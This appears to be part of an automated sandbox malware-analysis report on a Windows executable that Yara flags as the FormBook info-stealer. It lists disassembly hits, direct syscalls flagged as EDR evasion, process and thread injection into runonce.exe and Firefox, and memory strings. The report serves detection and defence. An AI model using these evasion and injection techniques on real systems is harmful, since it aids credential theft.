Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01500854 mov eax, dword ptr fs:[00000030h]	0_2_01500854
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E2840 mov ecx, dword ptr fs:[00000030h]	0_2_014E2840
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D4859 mov eax, dword ptr fs:[00000030h]	0_2_014D4859
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D4859 mov eax, dword ptr fs:[00000030h]	0_2_014D4859
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01566870 mov eax, dword ptr fs:[00000030h]	0_2_01566870
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01566870 mov eax, dword ptr fs:[00000030h]	0_2_01566870
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155E872 mov eax, dword ptr fs:[00000030h]	0_2_0155E872
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155E872 mov eax, dword ptr fs:[00000030h]	0_2_0155E872
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155C810 mov eax, dword ptr fs:[00000030h]	0_2_0155C810
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A830 mov eax, dword ptr fs:[00000030h]	0_2_0150A830
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157483A mov eax, dword ptr fs:[00000030h]	0_2_0157483A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157483A mov eax, dword ptr fs:[00000030h]	0_2_0157483A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F2835 mov eax, dword ptr fs:[00000030h]	0_2_014F2835
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F2835 mov eax, dword ptr fs:[00000030h]	0_2_014F2835
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F2835 mov eax, dword ptr fs:[00000030h]	0_2_014F2835
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F2835 mov ecx, dword ptr fs:[00000030h]	0_2_014F2835
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F2835 mov eax, dword ptr fs:[00000030h]	0_2_014F2835
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F2835 mov eax, dword ptr fs:[00000030h]	0_2_014F2835
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE8C0 mov eax, dword ptr fs:[00000030h]	0_2_014FE8C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A08C0 mov eax, dword ptr fs:[00000030h]	0_2_015A08C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C8F9 mov eax, dword ptr fs:[00000030h]	0_2_0150C8F9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C8F9 mov eax, dword ptr fs:[00000030h]	0_2_0150C8F9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159A8E4 mov eax, dword ptr fs:[00000030h]	0_2_0159A8E4
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155C89D mov eax, dword ptr fs:[00000030h]	0_2_0155C89D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0887 mov eax, dword ptr fs:[00000030h]	0_2_014D0887
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157EB50 mov eax, dword ptr fs:[00000030h]	0_2_0157EB50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01584B4B mov eax, dword ptr fs:[00000030h]	0_2_01584B4B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01584B4B mov eax, dword ptr fs:[00000030h]	0_2_01584B4B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01578B42 mov eax, dword ptr fs:[00000030h]	0_2_01578B42
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01566B40 mov eax, dword ptr fs:[00000030h]	0_2_01566B40
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01566B40 mov eax, dword ptr fs:[00000030h]	0_2_01566B40
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159AB40 mov eax, dword ptr fs:[00000030h]	0_2_0159AB40
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CCB7E mov eax, dword ptr fs:[00000030h]	0_2_014CCB7E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154EB1D mov eax, dword ptr fs:[00000030h]	0_2_0154EB1D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FEB20 mov eax, dword ptr fs:[00000030h]	0_2_014FEB20
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FEB20 mov eax, dword ptr fs:[00000030h]	0_2_014FEB20
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01598B28 mov eax, dword ptr fs:[00000030h]	0_2_01598B28
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01598B28 mov eax, dword ptr fs:[00000030h]	0_2_01598B28
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0BCD mov eax, dword ptr fs:[00000030h]	0_2_014D0BCD
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0BCD mov eax, dword ptr fs:[00000030h]	0_2_014D0BCD
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0BCD mov eax, dword ptr fs:[00000030h]	0_2_014D0BCD
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F0BCB mov eax, dword ptr fs:[00000030h]	0_2_014F0BCB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F0BCB mov eax, dword ptr fs:[00000030h]	0_2_014F0BCB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F0BCB mov eax, dword ptr fs:[00000030h]	0_2_014F0BCB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157EBD0 mov eax, dword ptr fs:[00000030h]	0_2_0157EBD0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155CBF0 mov eax, dword ptr fs:[00000030h]	0_2_0155CBF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FEBFC mov eax, dword ptr fs:[00000030h]	0_2_014FEBFC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8BF0 mov eax, dword ptr fs:[00000030h]	0_2_014D8BF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8BF0 mov eax, dword ptr fs:[00000030h]	0_2_014D8BF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8BF0 mov eax, dword ptr fs:[00000030h]	0_2_014D8BF0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01584BB0 mov eax, dword ptr fs:[00000030h]	0_2_01584BB0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01584BB0 mov eax, dword ptr fs:[00000030h]	0_2_01584BB0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0BBE mov eax, dword ptr fs:[00000030h]	0_2_014E0BBE
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0BBE mov eax, dword ptr fs:[00000030h]	0_2_014E0BBE
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0A5B mov eax, dword ptr fs:[00000030h]	0_2_014E0A5B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0A5B mov eax, dword ptr fs:[00000030h]	0_2_014E0A5B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6A50 mov eax, dword ptr fs:[00000030h]	0_2_014D6A50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6A50 mov eax, dword ptr fs:[00000030h]	0_2_014D6A50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6A50 mov eax, dword ptr fs:[00000030h]	0_2_014D6A50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6A50 mov eax, dword ptr fs:[00000030h]	0_2_014D6A50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6A50 mov eax, dword ptr fs:[00000030h]	0_2_014D6A50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6A50 mov eax, dword ptr fs:[00000030h]	0_2_014D6A50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D6A50 mov eax, dword ptr fs:[00000030h]	0_2_014D6A50
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154CA72 mov eax, dword ptr fs:[00000030h]	0_2_0154CA72
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154CA72 mov eax, dword ptr fs:[00000030h]	0_2_0154CA72
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157EA60 mov eax, dword ptr fs:[00000030h]	0_2_0157EA60
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150CA6F mov eax, dword ptr fs:[00000030h]	0_2_0150CA6F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150CA6F mov eax, dword ptr fs:[00000030h]	0_2_0150CA6F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150CA6F mov eax, dword ptr fs:[00000030h]	0_2_0150CA6F
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155CA11 mov eax, dword ptr fs:[00000030h]	0_2_0155CA11
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FEA2E mov eax, dword ptr fs:[00000030h]	0_2_014FEA2E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150CA38 mov eax, dword ptr fs:[00000030h]	0_2_0150CA38
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150CA24 mov eax, dword ptr fs:[00000030h]	0_2_0150CA24
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F4A35 mov eax, dword ptr fs:[00000030h]	0_2_014F4A35
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F4A35 mov eax, dword ptr fs:[00000030h]	0_2_014F4A35
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01504AD0 mov eax, dword ptr fs:[00000030h]	0_2_01504AD0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01504AD0 mov eax, dword ptr fs:[00000030h]	0_2_01504AD0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0AD0 mov eax, dword ptr fs:[00000030h]	0_2_014D0AD0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01526ACC mov eax, dword ptr fs:[00000030h]	0_2_01526ACC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01526ACC mov eax, dword ptr fs:[00000030h]	0_2_01526ACC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01526ACC mov eax, dword ptr fs:[00000030h]	0_2_01526ACC
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150AAEE mov eax, dword ptr fs:[00000030h]	0_2_0150AAEE
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150AAEE mov eax, dword ptr fs:[00000030h]	0_2_0150AAEE
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01508A90 mov edx, dword ptr fs:[00000030h]	0_2_01508A90
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DEA80 mov eax, dword ptr fs:[00000030h]	0_2_014DEA80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4A80 mov eax, dword ptr fs:[00000030h]	0_2_015A4A80
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8AA0 mov eax, dword ptr fs:[00000030h]	0_2_014D8AA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8AA0 mov eax, dword ptr fs:[00000030h]	0_2_014D8AA0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01526AA4 mov eax, dword ptr fs:[00000030h]	0_2_01526AA4
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0D59 mov eax, dword ptr fs:[00000030h]	0_2_014D0D59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0D59 mov eax, dword ptr fs:[00000030h]	0_2_014D0D59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0D59 mov eax, dword ptr fs:[00000030h]	0_2_014D0D59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8D59 mov eax, dword ptr fs:[00000030h]	0_2_014D8D59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8D59 mov eax, dword ptr fs:[00000030h]	0_2_014D8D59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8D59 mov eax, dword ptr fs:[00000030h]	0_2_014D8D59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8D59 mov eax, dword ptr fs:[00000030h]	0_2_014D8D59
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8D59 mov eax, dword ptr fs:[00000030h]	0_2_014D8D59

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Section loaded: NULL target: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\runonce.exe

Thread register set: target process: 4344

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\runonce.exe

Thread APC queued: target process: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe

Jump to behavior

Source: C:\Program Files (x86)\RJyDlfmPIIpOswAwDDttAdeqUqQMJcDZmIQNqofGQcdTFPmuP\5gtNFDn9VkJys5w.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: 5gtNFDn9VkJys5w.exe, 00000009.00000000.2669381031.0000000001281000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 00000009.00000002.3501989065.0000000001280000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3502968632.0000000001150000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: 5gtNFDn9VkJys5w.exe, 00000009.00000000.2669381031.0000000001281000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 00000009.00000002.3501989065.0000000001280000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3502968632.0000000001150000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 5gtNFDn9VkJys5w.exe, 00000009.00000000.2669381031.0000000001281000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 00000009.00000002.3501989065.0000000001280000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3502968632.0000000001150000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: 5gtNFDn9VkJys5w.exe, 00000009.00000000.2669381031.0000000001281000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 00000009.00000002.3501989065.0000000001280000.00000002.00000001.00040000.00000000.sdmp, 5gtNFDn9VkJys5w.exe, 0000000B.00000002.3502968632.0000000001150000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.gH68ux6XtG.exe.c60000.0.unpack, type: UNPACKEDPE
